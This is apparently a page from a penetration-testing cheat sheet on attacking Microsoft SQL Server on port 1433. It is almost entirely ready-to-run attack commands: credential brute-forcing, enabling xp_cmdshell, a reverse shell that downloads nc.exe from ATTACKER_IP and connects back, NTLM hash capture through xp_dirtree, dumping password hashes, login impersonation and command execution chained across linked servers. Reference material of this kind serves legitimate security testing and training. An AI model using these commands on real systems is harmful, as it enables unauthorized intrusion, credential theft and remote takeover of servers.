> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 1433 - MSSQL

> MSSQL enumeration and exploitation: xp_cmdshell, linked servers, credential extraction, and file access.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 1433 TARGET
```

***

## Connect

### impacket-mssqlclient

```bash theme={"dark"}
impacket-mssqlclient user:password@TARGET
impacket-mssqlclient user:password@TARGET -windows-auth
```

### sqsh

```bash theme={"dark"}
sqsh -S TARGET -U user -P password
```

***

## Brute-Force

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt mssql://TARGET
crackmapexec mssql TARGET -u users.txt -p passwords.txt
```

Default credentials: `sa` / (blank or weak password).

***

## Command Execution — xp\_cmdshell

### Enable xp\_cmdshell

```sql theme={"dark"}
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
```

### Execute Commands

```sql theme={"dark"}
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'dir C:\';
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\flag.txt';
```

### Reverse Shell

```sql theme={"dark"}
EXEC xp_cmdshell 'powershell -c "iwr http://ATTACKER_IP/nc.exe -OutFile C:\Windows\Temp\nc.exe"';
EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444';
```

***

## File Read

### OPENROWSET

```sql theme={"dark"}
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;
```

***

## Steal NTLM Hash

Force MSSQL to authenticate to attacker SMB:

```sql theme={"dark"}
EXEC xp_dirtree '\\ATTACKER_IP\share';
```

Capture with Responder:

```bash theme={"dark"}
responder -I eth0
```

***

## Linked Servers

### Enumerate Links

```sql theme={"dark"}
EXEC sp_linkedservers;
SELECT * FROM sys.servers;
```

### Execute on Linked Server

```sql theme={"dark"}
EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER];
```

### Chain Through Links

```sql theme={"dark"}
EXEC ('EXEC (''xp_cmdshell ''''whoami'''''') AT [SERVER_C]') AT [SERVER_B];
```

***

## Enumerate

### Databases

```sql theme={"dark"}
SELECT name FROM master.sys.databases;
```

### Tables

```sql theme={"dark"}
SELECT * FROM information_schema.tables;
```

### Users

```sql theme={"dark"}
SELECT name, type_desc FROM sys.server_principals;
```

### Password Hashes

```sql theme={"dark"}
SELECT name, password_hash FROM sys.sql_logins;
```

***

## Impersonation

```sql theme={"dark"}
-- Check who you can impersonate
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';

-- Impersonate
EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell 'whoami';
```

***

## Quick Reference

| Check               | Command                                 |
| ------------------- | --------------------------------------- |
| Connect             | `impacket-mssqlclient user:pass@TARGET` |
| Enable xp\_cmdshell | `sp_configure 'xp_cmdshell', 1`         |
| RCE                 | `EXEC xp_cmdshell 'whoami'`             |
| Steal hash          | `EXEC xp_dirtree '\\ATTACKER\share'`    |
| Linked servers      | `EXEC sp_linkedservers`                 |
